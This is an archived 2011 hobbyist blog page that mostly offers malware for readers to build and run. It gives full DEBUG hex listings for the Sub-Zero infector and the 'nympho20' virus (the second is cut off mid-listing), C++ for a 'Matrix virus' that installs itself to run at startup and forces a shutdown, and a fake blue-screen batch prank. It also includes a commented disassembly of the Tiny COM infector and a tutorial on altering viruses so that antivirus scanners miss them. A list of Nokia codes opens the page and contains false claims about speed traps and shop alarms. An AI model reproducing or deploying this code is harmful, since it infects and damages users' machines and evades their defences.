Kingdom Web's: 2011

Wednesday, September 7, 2011

Top Secrete Code of Nokia Phones

Anonymous September 07, 2011 0

On the main screen type :

*#06# Check the IMEI (International Mobile Equipment Identity).

*#7780# reset to factory settings.

*#67705646# This will clear the LCD display(operator logo).

*#0000# To view software version.

*#2820# Bluetooth device address.

*#746025625# Sim clock allowed status.

#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.

*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.

*#4720# - Half Rate Codec activation.

*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \

*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.

Wednesday, August 17, 2011

SHOW THE FUNNY BLUE SCREEN OF DEATH

Anonymous August 17, 2011 0

Everyone knows That when your windows computer shows the BLUE SCREEN (BSOD) it means that a virus has infected your computer or internal working of computer is at risk, this also comes when you are running multiple RAM’s and of different frequencies…

Now here is a cool but dangerous Virus that shows the “blue screen of death” when you run it .. Copy and paste in notepad and save the file as “bsod.bat” …. Then put it on any computer and run it … THEN you are done
CODE:

@echo off
cd /
cls
color 1f
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you’ve seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0×00000050 (0xFD3094C2,0×00000001,0xFBFE7617,0×0000 0000)
echo.
echo.
echo *** SPCMDCON.SYS – Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause :nul
cls
echo Downloading viruses . . .
ping localhost -n 5 :nul
dir /s
pause :nul

ENJOY GUYS
AND ALSO GIVE YOUR FEEDBACK

Making a matrix virus (dangerous virus )

Anonymous August 17, 2011 0

Matrix Virus.

1-Open notepad
2-Put in this code

CODE:-

// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
3-save it as matrix.exe
4-finish

Warning - Do not run it on your computer

Friday, May 6, 2011

- SUB-ZERO VIRUS -

Anonymous May 06, 2011 0

DEBUG < SUB-ZERO.USR

------------------------------------------------------------------------------
n sub-zero.com
e 0100 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
e 0110 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
e 0120 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0130 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
e 0140 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
e 0150 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
e 0160 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
e 0170 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
e 0180 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
e 0190 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
e 01A0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
e 01B0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
e 01C0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
e 01D0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
e 01E0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
e 01F0 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
e 0200 00 2E FF 2E 47 00 33 C0 8E C0 8B 89 31 DB 2E A3
e 0210 4B 00 26 A0 FE 03 2E A2 4D 00 26 C7 06 FC 03 F3
e 0220 A5 26 C6 06 FE 03 CB 58 04 10 90 8E C0 0E 1F B9
e 0230 00 03 B1 88 33 F6 8B FE 06 B8 42 01 50 EA FC 03
e 0240 00 00 8C C8 8E D0 BC 00 07 33 C0 8E D8 2E A1 4B
e 0250 00 A3 FC 03 2E A0 4D 00 A2 FE 03 8B DC B1 04 D3
e 0260 EB 83 C3 10 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00
e 0270 CD 21 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19
e 0280 00 0E 1F BA 5B 02 B8 21 25 CD 21 8E 06 31 00 26
e 0290 8E 06 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05
e 02A0 E0 F9 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35
e 02B0 00 52 51 53 50 06 1E B4 2A CD 21 2E C6 06 0E 00
e 02C0 00 81 F9 C6 07 74 30 3C 05 75 0D 80 FA 17 72 08
e 02D0 2E FE 06 0E 00 EB 20 90 B8 08 35 CD 21 2E 89 1E
e 02E0 13 00 2E 8C 06 15 00 0E 1F C7 06 1F 00 48 3F B8
e 02F0 08 25 BA 1E 02 CD 21 1F 07 58 5B 59 5A 9C 2E FF
e 0300 1E 17 00 1E 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA
e 0310 00 06 B1 04 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83
e 0320 3E 1F 00 09 75 17 52 51 50 B4 2A CD 21 81 FA 06
e 0330 06 75 07 B8 01 07 B2 80 CD 13 58 59 5A 2E 83 2E
e 0340 1F 00 01 EB 11 20 20 53 75 62 2D 5A 65 72 6F 20
e 0350 4E 59 48 43 20 20 2E FF 2E 13 00 9C 80 FC E0 75
e 0360 05 B8 00 03 9D CF 80 FC DE 74 2D 80 FC DD 74 0E
e 0370 3D 00 4B 75 03 E9 B4 00 9D 2E FF 2E 17 00 58 58
e 0380 B8 00 01 2E A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E
e 0390 A1 0F 00 2E FF 2E 0A 00 83 C4 06 9D 8C C8 8E D0
e 03A0 BC 10 07 06 06 33 FF 0E 07 B9 10 00 8B F3 BF 21
e 03B0 00 F3 A4 8C D8 8E C0 2E F7 26 7A 00 2E 03 06 2B
e 03C0 00 83 D2 00 2E F7 36 7A 00 8E D8 8B F2 8B FA 8C
e 03D0 C5 2E 8B 1E 2F 00 0B DB 74 13 B9 00 80 F3 A5 05
e 03E0 00 10 81 C5 00 10 8E D8 8E C5 4B 75 ED 2E 8B 0E
e 03F0 2D 00 F3 A4 58 50 05 10 00 2E 01 06 29 00 2E 01
e 0400 06 25 00 2E A1 21 00 1F 07 2E 8E 16 29 00 2E 8B
e 0410 26 27 00 2E FF 2E 23 00 33 C9 B8 01 43 CD 21 B4
e 0420 3C CD 21 B8 00 4B 9D 2E FF 2E 17 00 2E 80 3E 0E
e 0430 00 01 74 E4 2E C7 06 70 00 FF FF 2E C7 06 8F 00
e 0440 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52
e 0450 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A
e 0460 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 77 02
e 0470 F7 E3 F7 E1 0B D2 75 05 3D 10 07 72 F0 2E 8B 16
e 0480 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00
e 0490 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C
e 04A0 20 46 EB EC B9 0B 00 2B F1 BF 84 00 0E 07 B9 0B
e 04B0 00 F3 A6 75 03 E9 2F 02 B8 00 43 CD 21 72 05 2E
e 04C0 89 0E 72 00 72 25 32 C0 2E A2 4E 00 1E 07 8B FA
e 04D0 B9 41 00 F2 AE 80 7D FE 4D 74 0B 80 7D FE 6D 74
e 04E0 05 2E FE 06 4E 00 B8 00 3D CD 21 72 5A 2E A3 70
e 04F0 00 8B D8 B8 02 42 B9 FF FF BA FB FF CD 21 72 EB
e 0500 05 05 00 2E A3 11 00 B9 05 00 BA 6B 00 8C C8 8E
e 0510 D8 8E C0 B4 3F CD 21 8B FA BE 05 00 F3 A6 75 07
e 0520 B4 3E CD 21 E9 C0 01 B8 24 35 CD 21 89 1E 1B 00
e 0530 8C 06 1D 00 BA 1B 02 B8 24 25 CD 21 C5 16 80 00
e 0540 33 C9 B8 01 43 CD 21 72 3B 2E 8B 1E 70 00 B4 3E
e 0550 CD 21 2E C7 06 70 00 FF FF B8 02 3D CD 21 72 24
e 0560 2E A3 70 00 8C C8 8E D8 8E C0 8B 1E 70 00 B8 00
e 0570 57 CD 21 89 16 74 00 89 0E 76 00 B8 00 42 33 C9
e 0580 8B D1 CD 21 72 3D 80 3E 4E 00 00 74 03 EB 57 90
e 0590 BB 00 10 B4 48 CD 21 73 0B B4 3E 8B 1E 70 00 CD
e 05A0 21 E9 43 01 FF 06 8F 00 8E C0 33 F6 8B FE B9 10
e 05B0 07 F3 A4 8B D7 8B 0E 11 00 8B 1E 70 00 06 1F B4
e 05C0 3F CD 21 72 1C 03 F9 33 C9 8B D1 B8 00 42 CD 21
e 05D0 BE 05 00 B9 05 00 F3 2E A4 8B CF 33 D2 B4 40 CD
e 05E0 21 72 0D E9 BC 00 B9 1C 00 BA 4F 00 B4 3F CD 21
e 05F0 72 4A C7 06 61 00 84 19 A1 5D 00 A3 45 00 A1 5F
e 0600 00 A3 43 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00
e 0610 A1 53 00 83 3E 51 00 00 74 01 48 F7 26 78 00 03
e 0620 06 51 00 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3
e 0630 7C 00 89 16 7E 00 05 10 07 83 D2 00 72 3A F7 36
e 0640 78 00 0B D2 74 01 40 A3 53 00 89 16 51 00 A1 7C
e 0650 00 8B 16 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00
e 0660 C7 06 63 00 C5 00 A3 5D 00 C7 06 5F 00 10 07 33
e 0670 C9 8B D1 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00
e 0680 B4 40 CD 21 72 11 3B C1 75 18 8B 16 7C 00 8B 0E
e 0690 7E 00 B8 00 42 CD 21 72 09 33 D2 B9 10 07 B4 40
e 06A0 CD 21 2E 83 3E 8F 00 00 74 04 B4 49 CD 21 2E 83
e 06B0 3E 70 00 FF 74 31 2E 8B 1E 70 00 2E 8B 16 74 00
e 06C0 2E 8B 0E 76 00 B8 01 57 CD 21 B4 3E CD 21 2E C5
e 06D0 16 80 00 2E 8B 0E 72 00 B8 01 43 CD 21 2E C5 16
e 06E0 1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9D
e 06F0 2E FF 2E 17 00 00 00 00 00 00 00 00 00 00 00 00
e 0700 4D 9F 19 00 10 00 00 00 45 44 00 45 4C 00 00 00
e 0710 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
e 0720 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
e 0730 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0740 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
e 0750 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
e 0760 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
e 0770 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
e 0780 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
e 0790 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
e 07A0 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
e 07B0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
e 07C0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
e 07D0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
e 07E0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
e 07F0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
e 0800 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
e 0810 CD 20 A3 AA D4 3A A3 1A 1A 1A 1A 1A 1A 1A 1A 1A

rcx
717
w
q
------------------------------------------------------------------------------

Sub-Zero is a memory resident COM and EXE infector that is based somewhat on
on Jerusalem-B. It is the ansestor to the virus Captian Trips
which at this time has not been nailed by SCAN.

Be carefull because this virus will most likly format you hard drive if you
run it on the wrong day. One day of the year it will perform a HD format.
I think it's in June, hmmmm... D-Day rings a bell.

As of Scan-77 this virus can not be detected by SCAN or F-Prot.

HOW TO MODIFY A VIRUS

Anonymous May 06, 2011 0

ow heres what you do.

Step A
------

Make a target file like this with Debug

Copy the below file with your editor to a file called SAMPLE.USR

-------------------------------------------------------------------------------
n sample.com
a
int 20

rcx
2
w
q
------------------------------------------------------------------------------
Then uses Debug to make the file SAMPLE.COM executing this command --

DEBUG < SAMPLE.USR

This will make a two byte called SAMPLE.COM

STEP B
------

Infect the file with the virus. If this is a boot sector virus your on
your own. Do whatever you have to to infect the two byte file.

Make a copy of the file and keep it for safe keeping.

STEP C
------

Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the
lower versions) PCTOOLS Hex Editor will work too but it takes more work.

Now have DISKEDIT Hex-edit the infected file.

Now figure out where the middle of the file is. Next put block on and
go to the end of the file. At the end of the file go to the edit screen and
select fill. Fill the lower half of the file will nonsense characters, its
good to select 255d (FFh) the blank character.

Now save your changes and go to DOS

Now use SCAN to scan the file for viruses. If it detects the virus you
didnt delete the search string that SCAN is searching for. Get it???

You see all SCAN does is search files for strings that are related to viruses.
For example if SCAN was looking for CASCADE it look for something like this-

EB1DAD1273D1FF121F

In every file you specify. So what we are doing is narrowing down where that
string is in the virus that SCAN keeps finding.

So what you have to do is keep deleting parts of the virus with DISKEDIT
untill you finally narrow down the string.

Keep this in mind, search strings are in the first 150 bytes of the file
about 75% of the time.

Ok lets say you narrowed down the search string and lets say it's -

B8 92 19 B7 21 CD

It will most likly be longer but this an example.

Now back to DEBUG - Do the following--

DEBUG

E 0100 b8 92 19 b7 21 cd -- this is the string you found

Then type --

U

This will give you a unassembled look at what the id-string is. In this
example it was

mov ax,1992h
mov bx,21h
int 21h

Now this is what you have to do, and keep in mind the following ---

THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!!

Uses Turbo Debugger to find the string, you can use DEBUG but I don't know
how to do this from debug.

Ok say you got the string on the screen --

mov ax,1992h
mov bh,21h
int 21h

Write down the locations in the file where these strings are. Ex 0100h etc..

Now rearrange the AX mov with the BX mov like this ---

mov bh,21h
mov ax,1992h
int 21h

You see? You didn't change the way the code functions (THATS IF YOU KNOW
WHAT YOUR DOING!) but you changed the codes id-string for SCAN.

Now since Turbo Debugger dosent let you save the changes you must do it
via - Debug.

DEBUG virus.com

a 0122 - This is the address of the string

Now enter the assembler instructions --

mov bh,21
mov ax,1992h
int 21h

w

q

Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does ---
back to the lab. Oh well you get the point.

One warning, this only works with un-encrypting viruses, or on the
encryption mechanism of encrypting files (which will most likely be Scanned).

With that in mind, have fun.

VIRUS SPOTLIGHT

Anonymous May 06, 2011 0

The first virus I would like to spotlight is the Tiny virus, lets see
what our good friend Patti Hoffman (bitch) has written about it.

Name: Tiny
Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
V Status: Rare
Discovery: June, 1990
Symptoms: COMMAND.COM & .COM file growth
Origin: Denmark
Eff Length: 163 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected
files
General Comments:
The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
of Iceland in June 1990. This virus is a non-resident generic
.COM file infector, and it will infect COMMAND.COM.

The first time a file infected with the 163 COM Virus is executed,
the virus will attempt to infect the first .COM file in the
current directory. On bootable diskettes, this file will normally
be COMMAND.COM. After the first .COM file is infected,each time
an infected program is executed another .COM file will attempt to
be infected. Files are infected only if their original length is
greater than approximately 1K bytes.

Infected .COM files will increase in length by 163 bytes, and have
date/time stamps in the directory changed to the date/time the
infection occurred. Infected files will also always end with this
hex string: '2A2E434F4D00'.

This virus currently does nothing but replicate, and is the
smallest MS-DOS virus known as of its isolation date.

The Tiny Virus may or may not be related to the Tiny Family.
^like she'd know the difference!

OK, Theres the run down on the smallest MS-DOS virus known to man. As for
it being detected by SCAN we'll see about that.

Here is a dissasembly of the virus, It can be assembled under Turbo Assembler
or MASM.

-----------------------------------------------------------------------------

PAGE 59,132

data_2e equ 1ABh ;start of virus

seg_a segment byte public ;
assume cs:seg_a, ds:seg_a ;assume cs, ds - code

org 100h ;orgin of all COM files
s proc far

start:
jmp loc_1 ;jump to virus

;this is a replacement for an infected file

db 0CDh, 20h, 7, 8, 9 ;int 20h
;pop es

loc_1:
call sub_1 ;

s endp

sub_1 proc near ;
pop si ;locate all virus code via
sub si,10Bh ;si, cause all offsets will
mov bp,data_1[si] ;change when virus infects
add bp,103h ;a COM file
lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI
xor cx,cx ;clear cx - find only normal
;attributes
mov ah,4Eh ;find first file
loc_2:
int 21h ;

jc loc_6 ;no files found? then quit
mov dx,9Eh ;offset of filename found
mov ax,3D02h ;open file for read/write access
int 21h ;

mov bx,ax ;save handle into bx
mov ah,3Fh ;read from file
lea dx,[si+1A8h] ;offset of save buffer
mov di,dx ;
mov cx,3 ;read three bytes
int 21h ;

cmp byte ptr [di],0E9h ;compare buffer to virus id
;string
je loc_4 ;
loc_3:
mov ah,4Fh ;find the next file
jmp short loc_2 ;and test it
loc_4:
mov dx,[di+1] ;lsh of offset
mov data_1[si],dx ;
xor cx,cx ;msh of offset
mov ax,4200h ;set the file pointer
int 21h ;

mov dx,di ;buffer to save read
mov cx,2 ;read two bytes
mov ah,3Fh ;read from file
int 21h ;

cmp word ptr [di],807h ;compare buffer to virus id
je loc_3 ;same? then find another file

;heres where we infect a file

xor dx,dx ;set file pointer
xor cx,cx ;ditto
mov ax,4202h ;set file pointer
int 21h ;

cmp dx,0 ;returns msh
jne loc_3 ;not the same? find another file
cmp ah,0FEh ;lsh = 254???
jae loc_3 ;if more or equal find another file

mov ds:data_2e[si],ax ;point to data
mov ah,40h ;write to file
lea dx,[si+105h] ;segment:offset of write buffer
mov cx,0A3h ;write 163 bytes
int 21h ;

jc loc_5 ;error? then quit
mov ax,4200h ;set file pointer
xor cx,cx ;to the top of the file
mov dx,1 ;
int 21h ;

mov ah,40h ;write to file
lea dx,[si+1ABh] ;offset of jump to virus code
mov cx,2 ;two bytes
int 21h ;

;now close the file

loc_5:
mov ah,3Eh ;close file
int 21h ;

loc_6:
jmp bp ;jump to original file

data_1 dw 0 ;
db '*.COM',0 ;wild card search string

sub_1 endp
seg_a ends
end start

-------------------------------------------------------------------------------------------------------------

Its good to start off with a simple example like this. As you can see
what the virus does is use the DOS 4Eh function to find the firsy COM file
in the directory. If no files are found the program exits. If a file is
found it compares the virus id string (the virus jump instruction) to the
first two bytes of the COM file. If they match the program terminates.
If they don't match the virus will infect the file. Using two key MS-DOS
functions to infect.

The first -

INT 21h Function 42h
SET FILE POINTER

AH = 42h
AL = method code
BX = file handle
CX = most significant half to offset
DX = least " "

If there is an error in executing this function the carry flag will be set,
and AX will contian the error code. If no error is encountered

DX = most significant half of file pointer
AX = least " "

The second (and most) important function used by any virus is

INT 21h Function 40h
WRITE TO FILE OR DEVICE

AH = 40h
BX = handle
CX = number of bytes to write
DS:DX = segment of buffer

Returns

AX = bytes transferred

on error

AX = Error Code and flag is set.

An example of Function 40h is ----

mov ah,40h ;set function
mov bx,handle ;load bx with handle from prev open
mov cx,virus_size ;load cx with # of bytes to write
mov dx,offset write_buffer ;load dx with the offset of what to
;write to file
int 21h ;

This function is used by 98% of all MS-DOS viruses to copy itself to a
victim file.

Now heres a sample project - create a new strain of Tiny, have it restore
the original date and time etc...

Software Development

Anonymous May 06, 2011 0

OK Guys Now i am going to Teach you How To Make Software in "NOTEPAD".Her we go

**********************************************************************************

A:\Backup C:

Bad Sector(s) on disk A:\

File(s) Not found

(A)bort (R)etry (G)o Insane

Datawaste Productions

Proud to Present:

ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

ÛÛÛÛÛ°°°°°°±±±±±±²²²²²²ÛÛBAD SECTORÛÛ²²²²²²±±±±±±°°°°°°ÛÛÛÛÛ

ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

°°°°°°±±±±±²²²²ÛÛIN STEREO WHERE AVAILABLE!ÛÛ²²²²±±±±±°°°°°°

ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛISSUE I VOLUME I SERIES I ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

A feeble attempt at humor slightly related to anything

dealing with the online community.

STAFF

Editor in chief and

Sect. Of Defense candidate: Vince Lortho

Submitting Writers:

Anoj Shrestha

Mitch Tegram

Tom Leats

**********************************************************************************

Disclaimer

----------------------------------------------------------------------

This product is meant for educational purposes only. Any resemblance to

real persons, living or dead is purely coincidental. Void where prohibited. Some assembly required.

List each check separately by bank number. Batteries not included. Contents may settle during shipment. Use only as directed. No other warranty expressed or implied. Do not use while operating a motor vehicle or heavy equipment. Postage will be paid by addressee. Subject to CAB approval. This is not an offer to sell securities. Apply only to affected area. May be too intense for some viewers.

Do not stamp. Use other side for additional listings. For recreational use only. Do not disturb. All models over 18 years of age.If condition persists, consult your physician. No user-serviceable

parts inside. Freshest if eaten before date on carton. Subject to change without notice. Times approximate. Simulated picture. No postage necessary if mailed in the United States. Breaking seal constitutes acceptance of agreement. For off-road use only. As seen on TV. One size fits all. Many suitcases look alike. Contains a substantial amount of non-tobacco ingredients. Colors may, in time, fade.

We have sent the forms which seem to be right for you. Slippery when wet. For office use

only. Not affiliated with the American Red Cross. Drop in any mailbox. Edited for television. Keep cool; process promptly. Post office will not deliver without postage. List was current at time of printing.

Return to sender, no forwarding order on file, unable to forward. Not

responsible for direct, indirect, incidental or consequential damages

resulting from any defect, error or failure to perform. At participating locations only. Not the Beatles. Penalty for private use. See label for sequence. Substantial penalty for early withdrawal. Do not write below this line. Falling rock. Lost ticket pays maximum rate. Your cancelled check is your receipt. Add tonier. Place stamp here.

Avoid contact with skin. Sanitized for your protection. Be sure each item is properly endorsed. Sign here without admitting guilt. Slightly higher west of the Mississippi. Employees and their families are not eligible. Beware of dog. Contestants have been briefed on some questions before the show. Limited time offer, call now to insure prompt delivery. You must be present to win. No passes accepted for this engagement. No purchase necessary. Processed at location stamped

in code at top of carton. Shading within a garment may occur. Use only in well-ventilated area. Keep away from fire or flame.

Replace with same type. Approved for veterans. Booths for two or more. Check here if tax deductible. Some equipment shown is optional. Price does not include taxes. No Canadian coins. Not recommended for children. Prerecorded for this time zone. Reproduction strictly prohibited. No

solicitors. No alcohol, dogs, or horses. No anchovies unless otherwise specified. Restaurant package, not for resale. List at least two alternate dates. First pull up, then pull down. Call toll free before

digging. Driver does not carry cash. Some of the trademarks mentioned in this product appear for identification purposes only. Record additional transactions on back of previous stub.

This supersedes all previous notices.

Wednesday, March 2, 2011

The latest virus

Anonymous March 02, 2011 0

n nympho20.com e 0100 BD 00 00 48 CD 21 BB 4D 5A 74 53 1E 06 33 FF 8C e 0110 C0 48 8E D8 38 3D 75 44 88 1D 83 6D 03 44 83 6D e 0120 12 44 8B 45 12 8E D8 40 8E C0 88 3D C7 45 01 08 e 0130 00 C7 45 03 43 00 0E 1F 8D B6 00 01 81 F7 00 01 e 0140 B9 94 01 F3 A5 B8 89 01 8E D9 87 06 84 00 26 A3 e 0150 BC 01 8C C0 87 06 86 00 26 A3 BE 01 07 1F 8D B6 e 0160 FB 03 2E 3B 1C 74 13 86 FB 2E 2B 1C 74 0C BF 00 e 0170 01 57 C6 05 C3 FF D7 A4 A5 C3 8C C0 05 10 00 2E e 0180 03 44 16 50 2E FF 74 14 CB 3D FF FF 75 02 40 CF e 0190 80 FC 4E 74 33 80 FC 4F 74 2E 80 FC 11 74 56 80 e 01A0 FC 12 74 51 06 1E 60 33 ED 3D 00 6C 74 12 80 FC e 01B0 3D 74 0F 2D 00 4B 74 0D 61 1F 07 EA 00 00 00 00 e 01C0 87 D6 E9 C2 00 E9 20 01 E8 2A 02 72 25 60 06 B4 e 01D0 2F CD 21 26 8B 47 16 26 8B 4F 18 25 1F 00 83 E1 e 01E0 1F 49 33 C1 75 0A 26 81 6F 1A 13 03 26 19 47 1C e 01F0 07 61 CA 02 00 E8 FD 01 84 C0 75 3F 60 06 B4 51 e 0200 CD 21 8E C3 26 2B 1E 16 00 75 2E 8B DA 8A 07 50 e 0210 B4 2F CD 21 58 FE C0 75 03 83 C3 07 26 8B 47 17 e 0220 26 8B 4F 19 25 1F 00 83 E1 1F 49 33 C1 75 0A 26 e 0230 81 6F 1D 13 03 26 19 47 1F 07 61 CF 5B 4E 79 6D e 0240 70 68 6F 20 4D 69 74 6F 73 69 73 5D 20 76 32 2E e 0250 30 00 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 e 0260 31 39 39 33 20 4D 65 6D 6F 72 79 20 4C 61 70 73 e 0270 65 00 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D 20 e 0280 43 61 6E 61 64 61 00 E8 30 01 26 8B 45 0D 26 8B e 0290 4D 0F 25 1F 00 83 E1 1F 49 2B C1 75 48 E8 44 01 e 02A0 52 50 2D 18 00 1B D5 26 89 45 15 26 89 55 17 B4 e 02B0 3F B9 18 00 BA 13 04 CD 21 E8 1F 01 B4 40 CD 21 e 02C0 58 5A 2D 13 03 1B D5 26 89 45 15 26 89 55 17 B4 e 02D0 40 8B CD CD 21 26 8B 4D 0D 26 8B 55 0F 80 E1 E0 e 02E0 FE C1 E9 C9 00 E9 